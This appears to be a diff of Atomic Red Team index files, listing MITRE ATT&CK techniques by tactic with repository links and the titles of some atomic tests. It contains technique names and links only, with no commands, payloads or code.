- [T1091 Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1184 SSH Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1051 Shared Webroot](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1080 Taint Shared Content](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1072 Third-party Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1077 Windows Admin Shares](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1028 Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
# collection
|
||||
- [T1123 Audio Capture](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1123/T1123.md)
|
||||
- [T1123 Audio Capture](./T1123/T1123.md)
|
||||
- Atomic Test #1: SourceRecorder via Windows command prompt
|
||||
- Atomic Test #2: PowerShell Cmdlet via Windows command prompt
|
||||
- [T1119 Automated Collection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1119?T1119.md)
|
||||
- [T1115 Clipboard Data](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1115/T1115.md)
|
||||
- [T1119 Automated Collection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1115 Clipboard Data](./T1115/T1115.md)
|
||||
- Atomic Test #1: Utilize Clipboard to store or execute commands from
|
||||
- Atomic Test #2: PowerShell
|
||||
- [T1074 Data Staged](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1074?T1074.md)
|
||||
- [T1213 Data from Information Repositories](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1213?T1213.md)
|
||||
- [T1005 Data from Local System](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1005?T1005.md)
|
||||
- [T1039 Data from Network Shared Drive](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1039?T1039.md)
|
||||
- [T1025 Data from Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1025?T1025.md)
|
||||
- [T1114 Email Collection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1114?T1114.md)
|
||||
- [T1056 Input Capture](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1056?T1056.md)
|
||||
- [T1185 Man in the Browser](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1185?T1185.md)
|
||||
- [T1113 Screen Capture](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1113/T1113.md)
|
||||
- [T1074 Data Staged](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1213 Data from Information Repositories](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1005 Data from Local System](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1039 Data from Network Shared Drive](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1025 Data from Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1114 Email Collection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1056 Input Capture](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1185 Man in the Browser](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1113 Screen Capture](./T1113/T1113.md)
|
||||
- Atomic Test #1: Screencapture
|
||||
- Atomic Test #2: Screencapture (silent)
|
||||
- Atomic Test #3: X Windows Capture
|
||||
- Atomic Test #4: Import
|
||||
- [T1125 Video Capture](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1125?T1125.md)
|
||||
- [T1125 Video Capture](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
# exfiltration
|
||||
- [T1020 Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1020?T1020.md)
|
||||
- [T1002 Data Compressed](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1002/T1002.md)
|
||||
- [T1020 Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1002 Data Compressed](./T1002/T1002.md)
|
||||
- Atomic Test #1: Compress Data for Exfiltration With PowerShell
|
||||
- Atomic Test #2: Compress Data for Exfiltration With Rar
|
||||
- [T1022 Data Encrypted](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1022?T1022.md)
|
||||
- [T1030 Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1030?T1030.md)
|
||||
- [T1048 Exfiltration Over Alternative Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1048?T1048.md)
|
||||
- [T1041 Exfiltration Over Command and Control Channel](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1041?T1041.md)
|
||||
- [T1011 Exfiltration Over Other Network Medium](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1011?T1011.md)
|
||||
- [T1052 Exfiltration Over Physical Medium](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1052?T1052.md)
|
||||
- [T1029 Scheduled Transfer](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1029?T1029.md)
|
||||
- [T1022 Data Encrypted](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1030 Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1048 Exfiltration Over Alternative Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1041 Exfiltration Over Command and Control Channel](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1011 Exfiltration Over Other Network Medium](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1052 Exfiltration Over Physical Medium](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1029 Scheduled Transfer](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
# command-and-control
|
||||
- [T1043 Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1043?T1043.md)
|
||||
- [T1092 Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1092?T1092.md)
|
||||
- [T1090 Connection Proxy](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1090?T1090.md)
|
||||
- [T1094 Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1094?T1094.md)
|
||||
- [T1024 Custom Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1024?T1024.md)
|
||||
- [T1132 Data Encoding](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1132?T1132.md)
|
||||
- [T1001 Data Obfuscation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1001?T1001.md)
|
||||
- [T1172 Domain Fronting](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1172?T1172.md)
|
||||
- [T1008 Fallback Channels](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1008?T1008.md)
|
||||
- [T1104 Multi-Stage Channels](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1104?T1104.md)
|
||||
- [T1188 Multi-hop Proxy](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1188?T1188.md)
|
||||
- [T1026 Multiband Communication](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1026?T1026.md)
|
||||
- [T1079 Multilayer Encryption](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1079?T1079.md)
|
||||
- [T1205 Port Knocking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1205?T1205.md)
|
||||
- [T1219 Remote Access Tools](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1219?T1219.md)
|
||||
- [T1105 Remote File Copy](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1105/T1105.md)
|
||||
- [T1043 Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1092 Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1090 Connection Proxy](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1094 Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1024 Custom Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1132 Data Encoding](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1001 Data Obfuscation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1172 Domain Fronting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1008 Fallback Channels](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1104 Multi-Stage Channels](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1188 Multi-hop Proxy](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1026 Multiband Communication](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1079 Multilayer Encryption](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1205 Port Knocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1219 Remote Access Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1105 Remote File Copy](./T1105/T1105.md)
|
||||
- Atomic Test #1: xxxx
|
||||
- [T1071 Standard Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1071?T1071.md)
|
||||
- [T1032 Standard Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1032?T1032.md)
|
||||
- [T1095 Standard Non-Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1095?T1095.md)
|
||||
- [T1065 Uncommonly Used Port](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1065?T1065.md)
|
||||
- [T1102 Web Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1102?T1102.md)
|
||||
- [T1071 Standard Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1032 Standard Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1095 Standard Non-Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1065 Uncommonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1102 Web Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
# initial-access
|
||||
- [T1189 Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1189?T1189.md)
|
||||
- [T1190 Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1190?T1190.md)
|
||||
- [T1200 Hardware Additions](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1200?T1200.md)
|
||||
- [T1091 Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1091?T1091.md)
|
||||
- [T1193 Spearphishing Attachment](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1193?T1193.md)
|
||||
- [T1192 Spearphishing Link](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1192?T1192.md)
|
||||
- [T1194 Spearphishing via Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1194?T1194.md)
|
||||
- [T1195 Supply Chain Compromise](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1195?T1195.md)
|
||||
- [T1199 Trusted Relationship](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1199?T1199.md)
|
||||
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1078?T1078.md)
|
||||
- [T1189 Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1190 Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1200 Hardware Additions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1091 Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1193 Spearphishing Attachment](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1192 Spearphishing Link](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1194 Spearphishing via Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1195 Supply Chain Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1199 Trusted Relationship](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
|
||||
+59
-59
@@ -1,61 +1,61 @@
|
||||
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control |
|
||||
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
|
||||
| [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1189?T1189.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1155?T1155.md) | [.bash_profile and .bashrc](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1156?T1156.md) | [Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1134?T1134.md) | [Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1134?T1134.md) | [Account Manipulation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1098?T1098.md) | [Account Discovery](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1087/T1087.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1155?T1155.md) | [Audio Capture](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1123/T1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1020?T1020.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1043?T1043.md) |
|
||||
| [Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1190?T1190.md) | [CMSTP](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1191?T1191.md) | [Accessibility Features](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1015?T1015.md) | [Accessibility Features](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1015?T1015.md) | [BITS Jobs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1197?T1197.md) | [Bash History](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1139/T1139.md) | [Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1010?T1010.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1017?T1017.md) | [Automated Collection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1119?T1119.md) | [Data Compressed](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1002/T1002.md) | [Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1092?T1092.md) |
|
||||
| [Hardware Additions](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1200?T1200.md) | [Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1059?T1059.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1182?T1182.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1182?T1182.md) | [Binary Padding](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1009?T1009.md) | [Brute Force](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1110/T1110.md) | [Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1217?T1217.md) | [Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1175?T1175.md) | [Clipboard Data](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1115/T1115.md) | [Data Encrypted](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1022?T1022.md) | [Connection Proxy](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1090?T1090.md) |
|
||||
| [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1091?T1091.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1196?T1196.md) | [AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1103?T1103.md) | [AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1103?T1103.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1088?T1088.md) | [Credential Dumping](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1003/T1003.md) | [File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1083?T1083.md) | [Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1210?T1210.md) | [Data Staged](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1074?T1074.md) | [Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1030?T1030.md) | [Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1094?T1094.md) |
|
||||
| [Spearphishing Attachment](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1193?T1193.md) | [Dynamic Data Exchange](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1173?T1173.md) | [Application Shimming](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1138?T1138.md) | [Application Shimming](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1138?T1138.md) | [CMSTP](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1191?T1191.md) | [Credentials in Files](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1081?T1081.md) | [Network Service Scanning](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1046/T1046.md) | [Logon Scripts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1037?T1037.md) | [Data from Information Repositories](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1213?T1213.md) | [Exfiltration Over Alternative Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1048?T1048.md) | [Custom Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1024?T1024.md) |
|
||||
| [Spearphishing Link](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1192?T1192.md) | [Execution through API](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1106?T1106.md) | [Authentication Package](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1131?T1131.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1088?T1088.md) | [Clear Command History](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1146/T1146.md) | [Credentials in Registry](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1214?T1214.md) | [Network Share Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1135?T1135.md) | [Pass the Hash](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1075?T1075.md) | [Data from Local System](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1005?T1005.md) | [Exfiltration Over Command and Control Channel](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1041?T1041.md) | [Data Encoding](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1132?T1132.md) |
|
||||
| [Spearphishing via Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1194?T1194.md) | [Execution through Module Load](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1129?T1129.md) | [BITS Jobs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1197?T1197.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1038?T1038.md) | [Code Signing](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1116?T1116.md) | [Exploitation for Credential Access](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1212?T1212.md) | [Password Policy Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1201?T1201.md) | [Pass the Ticket](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1097?T1097.md) | [Data from Network Shared Drive](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1039?T1039.md) | [Exfiltration Over Other Network Medium](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1011?T1011.md) | [Data Obfuscation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1001?T1001.md) |
|
||||
| [Supply Chain Compromise](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1195?T1195.md) | [Exploitation for Client Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1203?T1203.md) | [Bootkit](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1067?T1067.md) | [Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1157?T1157.md) | [Component Firmware](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1109?T1109.md) | [Forced Authentication](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1187?T1187.md) | [Peripheral Device Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1120?T1120.md) | [Remote Desktop Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1076?T1076.md) | [Data from Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1025?T1025.md) | [Exfiltration Over Physical Medium](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1052?T1052.md) | [Domain Fronting](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1172?T1172.md) |
|
||||
| [Trusted Relationship](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1199?T1199.md) | [Graphical User Interface](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1061?T1061.md) | [Browser Extensions](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1176/T1176.md) | [Exploitation for Privilege Escalation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1068?T1068.md) | [Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1122?T1122.md) | [Hooking](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179/T1179.md) | [Permission Groups Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1069?T1069.md) | [Remote File Copy](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1105/T1105.md) | [Email Collection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1114?T1114.md) | [Scheduled Transfer](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1029?T1029.md) | [Fallback Channels](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1008?T1008.md) |
|
||||
| [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1078?T1078.md) | [InstallUtil](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1118/T1118.md) | [Change Default File Association](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1042?T1042.md) | [Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1181?T1181.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1196?T1196.md) | [Input Capture](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1056?T1056.md) | [Process Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1057?T1057.md) | [Remote Services](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1021?T1021.md) | [Input Capture](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1056?T1056.md) | | [Multi-Stage Channels](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1104?T1104.md) |
|
||||
| | [LSASS Driver](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1177?T1177.md) | [Component Firmware](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1109?T1109.md) | [File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1044?T1044.md) | [DCShadow](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1207?T1207.md) | [Input Prompt](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1141?T1141.md) | [Query Registry](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1012?T1012.md) | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1091?T1091.md) | [Man in the Browser](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1185?T1185.md) | | [Multi-hop Proxy](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1188?T1188.md) |
|
||||
| | [Launchctl](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1152?T1152.md) | [Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1122?T1122.md) | [Hooking](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179/T1179.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1038?T1038.md) | [Kerberoasting](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1208?T1208.md) | [Remote System Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1018?T1018.md) | [SSH Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1184?T1184.md) | [Screen Capture](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1113/T1113.md) | | [Multiband Communication](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1026?T1026.md) |
|
||||
| | [Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1168?T1168.md) | [Create Account](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1136/T1136.md) | [Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1183?T1183.md) | [DLL Side-Loading](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1073?T1073.md) | [Keychain](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1142?T1142.md) | [Security Software Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1063?T1063.md) | [Shared Webroot](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1051?T1051.md) | [Video Capture](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1125?T1125.md) | | [Multilayer Encryption](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1079?T1079.md) |
|
||||
| | [Mshta](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1170/T1170.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1038?T1038.md) | [Launch Daemon](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1160?T1160.md) | [Deobfuscate/Decode Files or Information](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1140?T1140.md) | [LLMNR/NBT-NS Poisoning](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1171?T1171.md) | [System Information Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1082?T1082.md) | [Taint Shared Content](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1080?T1080.md) | | | [Port Knocking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1205?T1205.md) |
|
||||
